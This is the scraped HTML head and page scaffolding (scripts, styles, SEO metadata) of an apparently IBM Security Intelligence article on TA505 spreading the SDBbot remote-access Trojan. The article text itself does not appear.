CINXE.COM

TA505 Continues to Infect Networks With SDBbot RAT

<!doctype html> <html lang="en-US"> <head> <meta charset="UTF-8"> <link rel="shortcut icon" type="image/x-icon" href="https://securityintelligence.com/wp-content/themes/sapphire/images/favicon.ico" sizes="32x32" /> <meta name="viewport" content="width=device-width,minimum-scale=1,initial-scale=1,maximum-scale=1"> <!-- DEFINITIONS --> <title>TA505 Continues to Infect Networks With SDBbot RAT</title> <!--<meta name="description" content="">--> <!-- THEME COLOR --> <meta name="theme-color" content="#000000"> <!-- REFERRER POLICY --> <meta name="referrer" content="no-referrer-when-downgrade"> <!-- LANGUAGE/TRANSLATIONS --> <!-- AMP SCRIPTS --> <script async src="https://cdn.ampproject.org/v0.js"></script> <script async custom-element="amp-list" src="https://cdn.ampproject.org/v0/amp-list-0.1.js"></script> <script async custom-template="amp-mustache" src="https://cdn.ampproject.org/v0/amp-mustache-0.2.js"></script> <script async custom-element="amp-accordion" src="https://cdn.ampproject.org/v0/amp-accordion-0.1.js"></script> <script custom-element="amp-animation" src="https://cdn.ampproject.org/v0/amp-animation-0.1.js" async></script> <script custom-element="amp-position-observer" src="https://cdn.ampproject.org/v0/amp-position-observer-0.1.js" async></script> <script async custom-element="amp-bind" src="https://cdn.ampproject.org/v0/amp-bind-0.1.js"></script> <script async custom-element="amp-autocomplete" src="https://cdn.ampproject.org/v0/amp-autocomplete-0.1.js"></script> <script async custom-element="amp-social-share" src="https://cdn.ampproject.org/v0/amp-social-share-0.1.js"></script> <script type="module" src="https://1.www.s81c.com/common/carbon-for-ibm-dotcom/version/v1.35.0/card-section-simple.min.js"></script> <script type="module" src="https://1.www.s81c.com/common/carbon-for-ibm-dotcom/tag/v1/latest/card-section-simple.min.js"></script> <script type="module" 
src="https://1.www.s81c.com/common/carbon-for-ibm-dotcom/tag/v1/next/card-section-simple.min.js"></script> <script type="module" src="https://1.www.s81c.com/common/carbon-for-ibm-dotcom/version/v2.11.0/card.min.js"></script> <script type="module" src="https://1.www.s81c.com/common/carbon-for-ibm-dotcom/version/v2.11.0/image.min.js"></script> <script async custom-element="amp-lightbox-gallery" src="https://cdn.ampproject.org/v0/amp-lightbox-gallery-0.1.js"></script> <script src="https://unpkg.com/swiper/swiper-bundle.min.js"></script> <script async custom-element="amp-video" src="https://cdn.ampproject.org/v0/amp-video-0.1.js"></script> <script async custom-element="amp-youtube" src="https://cdn.ampproject.org/v0/amp-youtube-0.1.js"></script> <link rel="preload" as="image" href="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2025/02/Futuristic-technological-advance-of-generative-AI-generating-code.-Trailblazing-300x158.jpeg.webp" media="(max-width: 300px)"> <link rel="preload" as="image" href="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2025/02/Futuristic-technological-advance-of-generative-AI-generating-code.-Trailblazing-630x330.jpeg.webp" media="(max-width: 1200px) and (min-width: 301px)"> <link rel="preload" as="image" href="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2025/02/Futuristic-technological-advance-of-generative-AI-generating-code.-Trailblazing.jpeg.webp" media="(max-width: 2400px) and (min-width: 631px)"> <link rel="preload" as="image" href="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2025/02/Futuristic-technological-advance-of-generative-AI-generating-code.-Trailblazing.jpeg.webp" media="(max-width: 2400px) and (min-width: 1201px)"> <!-- ANALYTICS --> <script> window._ibmAnalytics = { "settings": { "name": "SecurityIntelligence", "tealiumProfileName": "ibm-subsidiary" }, "digitalData.page.services.google.enabled": true }; window.digitalData = { "page": { "pageInfo": { 
"effectiveDate": "2020-04-14", "publishDate": "2020-04-14", "ibm": { "siteId": "IBM_" + _ibmAnalytics.settings.name, } }, "category": { "primaryCategory": "PC090" } } }; // Custom Click Tagging // Collect and send clicks not detectable by ida_stats.js function sendClickTag(section, feature, destination) { console.log(section + " " + feature) var config = { type: 'ELEMENT', primaryCategory: section, // e_a1 - Element Category eventName: feature, // e_a2 - Element Name targetURL: destination, // e_a7 - Element Attribute: ibmEvTarget }; ibmStats.event(config); } // Custom Click Tagging // Collect and send clicks not detectable by ida_stats.js // function sendClickConversion(feature, title) { // var config = { // type : 'pageclick', // primaryCategory : 'PAGE CLICK', // eventCategoryGroup : "TIMELINE - SECURITY INTELLIGENCE", // eventName : feature, // targetTitle : title // }; // ibmStats.event(config); // } // Custom Link Event // Add clicktag event on every link inside the element function tagAllLinks(element, section, feature) { var element = document.querySelectorAll(element); if (typeof(element) != 'undefined' && element != null) { for (var i = 0; i < element.length; i++) { var elements = element[i].querySelectorAll("a:not(.btn)"); for (var o = 0; o < elements.length; o++) { if (elements[o].getAttribute('listener') !== 'true') { var destination = elements[o].getAttribute('href'); elements[o].addEventListener('click', function() { if (this.getAttribute('listener') === 'true') { sendClickTag(section, feature, this.getAttribute('href')); this.setAttribute('listener', 'false'); } }, false); elements[o].setAttribute('listener', 'true'); } } } } } window.onload = function() { // Call to action click tag var ctaButton = document.querySelectorAll(".single__content a"); if (typeof(ctaButton) != 'undefined' && ctaButton != null && ctaButton.length !== 0) { for (var i = 0; i < ctaButton.length; i++) { ctaButton[i].addEventListener('click', function() { if 
(this.getAttribute('listener') === 'true') { sendClickTag("BODY", "CALL TO ACTION"); this.setAttribute('listener', 'false'); } }, false); ctaButton[i].setAttribute('listener', 'true'); } } // Read more click tag var readButton = document.querySelectorAll(".continue-reading button"); if (typeof(readButton) != 'undefined' && readButton != null && readButton.length !== 0) { for (var i = 0; i < readButton.length; i++) { readButton[i].addEventListener('click', function() { if (this.getAttribute('listener') === 'true') { sendClickTag("BODY", "READ-MORE"); this.setAttribute('listener', 'false'); } }, false); readButton[i].setAttribute('listener', 'true'); } } // LISTICLES tag - Arrows //left arrow var leftArrow = document.getElementById("prev"); if (typeof(leftArrow) != 'undefined' && leftArrow != null) { //for (var i = 0; i < leftArrow.length; i++) { leftArrow.addEventListener('click', function() { if (this.getAttribute('listener') === 'true' && leftArrow.id == "prev") { sendClickTag("BODY", "LISTICLE-LEFT-ARROW"); this.setAttribute('listener', 'false'); } }, false); leftArrow.setAttribute('listener', 'true'); //} } //right arrow var rightArrow = document.getElementById("next"); if (typeof(rightArrow) != 'undefined' && rightArrow != null) { //for (var i = 0; i < rightArrow.length; i++) { rightArrow.addEventListener('click', function() { if (this.getAttribute('listener') === 'true' && rightArrow.id == "next") { sendClickTag("BODY", "LISTICLE-RIGHT-ARROW"); this.setAttribute('listener', 'false'); } }, false); rightArrow.setAttribute('listener', 'true'); //} } // LISTICLES tag - numbers var listicleTopButton = document.querySelectorAll(".listicle__pagination__numbers"); if (typeof(listicleTopButton) != 'undefined' && listicleTopButton != null && listicleTopButton.length !== 0) { for (var i = 0; i < listicleTopButton.length; i++) { var currentSlide = 1; listicleTopButton[i].addEventListener('click', function() { if (this.getAttribute('listener') === 'true') { currentSlide++; 
var total = i; // var clickedSlides=currentSlide/2; // console.log(clickedSlides.toFixed()); //I'm removing 2 because 2 arrows on the listicle are unclickable, but present on the DOM // clickableArrows = i-2; // clickableArrows = i-1; // I'm deviding by 2 because on each slide we have 2 arrows, so we were actually sendind the double of tags // clickableArrows= clickableArrows/2; // console.log(i); // clickableArrows.toFixed(); if (currentSlide <= total) { sendClickTag("PAGE CLICK", "LISTICLE-NAVIGATION-SLIDE" + currentSlide); this.setAttribute('listener', 'false'); } else { sendClickTag("PAGE CLICK", "LISTICLE-NAVIGATION-END"); this.setAttribute('listener', 'false'); } } }, false); listicleTopButton[i].setAttribute('listener', 'true'); } } // // Timeline box click tag // var boxButton = document.querySelectorAll(".timeline__content .box"); // if (typeof(boxButton) != 'undefined' && boxButton != null && boxButton.length !== 0) { // for (var i = 0; i < boxButton.length; i++) { // boxButton[i].addEventListener('click', function(){ // if (this.getAttribute('listener') === 'true') { // sendClickConversion("DETAILED VIEW", this.getAttribute('data-title')); // this.setAttribute('listener', 'false'); // } // }, false); // boxButton[i].setAttribute('listener', 'true'); // } // } }; </script> <script src="https://1.www.s81c.com/common/stats/ibm-common.js" type="text/javascript" async="async"></script> <!-- AMP DEFAULT CSS --> <style amp-boilerplate> body { -webkit-animation: -amp-start 8s steps(1, end) 0s 1 normal both; -moz-animation: -amp-start 8s steps(1, end) 0s 1 normal both; -ms-animation: -amp-start 8s steps(1, end) 0s 1 normal both; animation: -amp-start 8s steps(1, end) 0s 1 normal both } @-webkit-keyframes -amp-start { from { visibility: hidden } to { visibility: visible } } @-moz-keyframes -amp-start { from { visibility: hidden } to { visibility: visible } } @-ms-keyframes -amp-start { from { visibility: hidden } to { visibility: visible } } @-o-keyframes 
-amp-start { from { visibility: hidden } to { visibility: visible } } @keyframes -amp-start { from { visibility: hidden } to { visibility: visible } } </style><noscript> <style amp-boilerplate> body { -webkit-animation: none; -moz-animation: none; -ms-animation: none; animation: none } </style> </noscript> <link rel="stylesheet" href="https://securityintelligence.com/wp-content/themes/sapphire/minifications/modules.css?v=1715191630"> <!-- CUSTOM CSS --> <meta name='robots' content='max-image-preview:large' /> <style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style> <link rel="alternate" type="application/rss+xml" title="Security Intelligence &raquo; TA505 Continues to Infect Networks With SDBbot RAT Comments Feed" href="https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/feed/" /> <script type="text/javascript"> /* <![CDATA[ */ window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/securityintelligence.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.7.1"}}; /*! 
This file is auto-generated */ !function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return e===r[t]})}function u(e,t,n){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\uddfa\ud83c\uddf3","\ud83c\uddfa\u200b\ud83c\uddf3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof 
URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings); /* ]]> */ </script> <style id='wp-emoji-styles-inline-css' type='text/css'> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 0.07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://securityintelligence.com/wp-includes/css/dist/block-library/style.min.css?ver=6.7.1' type='text/css' media='all' /> <style id='classic-theme-styles-inline-css' type='text/css'> /*! 
This file is auto-generated */ .wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none} </style> <style id='global-styles-inline-css' type='text/css'> :root{--wp--preset--aspect-ratio--square: 1;--wp--preset--aspect-ratio--4-3: 4/3;--wp--preset--aspect-ratio--3-4: 3/4;--wp--preset--aspect-ratio--3-2: 3/2;--wp--preset--aspect-ratio--2-3: 2/3;--wp--preset--aspect-ratio--16-9: 16/9;--wp--preset--aspect-ratio--9-16: 9/16;--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 
100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flex{display: flex;}.is-layout-flex{flex-wrap: wrap;align-items: center;}.is-layout-flex > :is(*, div){margin: 0;}body .is-layout-grid{display: grid;}.is-layout-grid > :is(*, div){margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) 
!important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: 
var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: 
var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;} :where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;} :where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;} :root :where(.wp-block-pullquote){font-size: 1.5em;line-height: 1.6;} </style> <link rel='stylesheet' id='taxonomy-image-plugin-public-css' href='https://securityintelligence.com/wp-content/plugins/taxonomy-images/css/style.css?ver=0.9.6' type='text/css' media='screen' /> <script type="text/javascript" src="https://securityintelligence.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1" id="jquery-core-js"></script> <script type="text/javascript" 
src="https://securityintelligence.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1" id="jquery-migrate-js"></script> <script type="text/javascript" src="https://securityintelligence.com/wp-content/themes/sapphire/app/javascript/si-theme-cookie.js?ver=6.7.1" id="si-cookie-consent-js"></script> <link rel="https://api.w.org/" href="https://securityintelligence.com/wp-json/" /><link rel="alternate" title="JSON" type="application/json" href="https://securityintelligence.com/wp-json/wp/v2/ibm_internals/418017" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://securityintelligence.com/xmlrpc.php?rsd" /> <meta name="generator" content="WordPress 6.7.1" /> <link rel='shortlink' href='https://securityintelligence.com/?p=418017' /> <link rel="alternate" title="oEmbed (JSON)" type="application/json+oembed" href="https://securityintelligence.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fsecurityintelligence.com%2Fposts%2Fta505-continues-to-infect-networks-with-sdbbot-rat%2F" /> <link rel="alternate" title="oEmbed (XML)" type="text/xml+oembed" href="https://securityintelligence.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fsecurityintelligence.com%2Fposts%2Fta505-continues-to-infect-networks-with-sdbbot-rat%2F&#038;format=xml" /> <link rel="icon" href="https://securityintelligence.com/wp-content/uploads/2016/04/SI_primary_rgb-80x80.png" sizes="32x32" /> <link rel="icon" href="https://securityintelligence.com/wp-content/uploads/2016/04/SI_primary_rgb.png" sizes="192x192" /> <link rel="apple-touch-icon" href="https://securityintelligence.com/wp-content/uploads/2016/04/SI_primary_rgb.png" /> <meta name="msapplication-TileImage" content="https://securityintelligence.com/wp-content/uploads/2016/04/SI_primary_rgb.png" /> <style amp-custom>@import url('https://1.www.s81c.com/common/carbon-for-ibm-dotcom/tag/v1/latest/plex.css');</style><link rel="stylesheet" href="https://unpkg.com/swiper/swiper-bundle.min.css"><link rel="stylesheet" 
href="https://securityintelligence.com/wp-content/themes/sapphire/minifications/single.css?v=1734627165"> <!-- YOAST SEO --> <!-- This site is optimized with the Yoast SEO Premium plugin v13.1 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="IBM X-Force IRIS recently identified attacks likely linked to Hive0065, also known as TA505, which spread the SDBbot remote-access Trojan (RAT) alongside other custom malware."/> <meta name="robots" content="max-snippet:-1, max-image-preview:large, max-video-preview:-1"/> <link rel="canonical" href="https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="article" /> <meta property="og:title" content="TA505 Continues to Infect Networks With SDBbot RAT" /> <meta property="og:description" content="IBM X-Force IRIS recently identified attacks likely linked to Hive0065, also known as TA505, which spread the SDBbot remote-access Trojan (RAT) alongside other custom malware." 
/> <meta property="og:url" content="https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/" /> <meta property="og:site_name" content="Security Intelligence" /> <meta property="article:tag" content="Command-and-Control (C&amp;C)" /> <meta property="article:tag" content="Cybercrime" /> <meta property="article:tag" content="Macros" /> <meta property="article:tag" content="Malware" /> <meta property="article:tag" content="Malware Analysis" /> <meta property="article:tag" content="Open Source" /> <meta property="article:tag" content="Remote-Access Trojan (RAT)" /> <meta property="article:tag" content="Targeted Attacks" /> <meta property="article:tag" content="Threat Intelligence" /> <meta property="article:tag" content="Trojan" /> <meta property="article:tag" content="X-Force" /> <meta property="article:section" content="Advanced Threats" /> <meta property="fb:app_id" content="3703311399714818" /> <meta property="og:image" content="https://securityintelligence.com/wp-content/uploads/2020/04/ta505-continues-to-infect-networks-with-sdbbot-rat.jpg" /> <meta property="og:image:secure_url" content="https://securityintelligence.com/wp-content/uploads/2020/04/ta505-continues-to-infect-networks-with-sdbbot-rat.jpg" /> <meta property="og:image:width" content="1200" /> <meta property="og:image:height" content="629" /> <meta name="twitter:card" content="summary" /> <meta name="twitter:description" content="IBM X-Force IRIS recently identified attacks likely linked to Hive0065, also known as TA505, which spread the SDBbot remote-access Trojan (RAT) alongside other custom malware." 
/> <meta name="twitter:title" content="TA505 Continues to Infect Networks With SDBbot RAT" /> <meta name="twitter:image" content="https://securityintelligence.com/wp-content/uploads/2020/04/ta505-continues-to-infect-networks-with-sdbbot-rat.jpg" /> <script type='application/ld+json' class='yoast-schema-graph yoast-schema-graph--main'>{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://securityintelligence.com/#website","url":"https://securityintelligence.com/","name":"Security Intelligence","inLanguage":"en-US","description":"Analysis and Insight for Information Security Professionals","potentialAction":{"@type":"SearchAction","target":"https://securityintelligence.com/?s={search_term_string}","query-input":"required name=search_term_string"}},{"@type":"ImageObject","@id":"https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/#primaryimage","inLanguage":"en-US","url":"https://securityintelligence.com/wp-content/uploads/2020/04/ta505-continues-to-infect-networks-with-sdbbot-rat.jpg","width":1200,"height":629,"caption":"A security analyst conducts research on Hive0065&#039;s SDBbot RAT"},{"@type":"WebPage","@id":"https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/#webpage","url":"https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/","name":"TA505 Continues to Infect Networks With SDBbot RAT","isPartOf":{"@id":"https://securityintelligence.com/#website"},"inLanguage":"en-US","primaryImageOfPage":{"@id":"https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/#primaryimage"},"datePublished":"2020-04-14T10:00:27+00:00","dateModified":"2021-02-02T14:55:09+00:00","description":"IBM X-Force IRIS recently identified attacks likely linked to Hive0065, also known as TA505, which spread the SDBbot remote-access Trojan (RAT) alongside other custom malware."}]}</script> <!-- / Yoast SEO Premium plugin. 
position=bottom)" class="tap_target "> <div class="scroll-to-top__button"> <amp-img width="12" height="16" layout="fixed" alt="Back-to-top" src="https://securityintelligence.com/wp-content/themes/sapphire/images/scroll-to-top.svg"></amp-img> </div> </button> </div> <!-- SCROLL SHOW/HIDE ANIMATION --> <amp-animation id="showAnim" layout="nodisplay"> <script type="application/json"> { "duration": "200ms", "fill": "both", "iterations": "1", "direction": "alternate", "animations": [{ "selector": "#scrollToTopButton", "keyframes": [{ "opacity": "1", "visibility": "visible" }] }] } </script> </amp-animation> <amp-animation id="hideAnim" layout="nodisplay"> <script type="application/json"> { "duration": "200ms", "fill": "both", "iterations": "1", "direction": "alternate", "animations": [{ "selector": "#scrollToTopButton", "keyframes": [{ "opacity": "0", "visibility": "hidden" }] }] } </script> </amp-animation> </div> <!-- CHECK PAGE POSITION --> <amp-position-observer target="top-viewer" intersection-ratios="0" on="enter:hideAnim.start; exit:showAnim.start" layout="nodisplay"></amp-position-observer> <!-- SCHEMA --> <script id="post-schema" type="application/ld+json"> { "@context": "http://schema.org", "@type": "Article", "headline": "TA505 Continues to Infect Networks With SDBbot RAT", "mainEntityOfPage": "https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/", "author": { "@type": "Person", "name": "Melissa Frydrych" }, "datePublished": 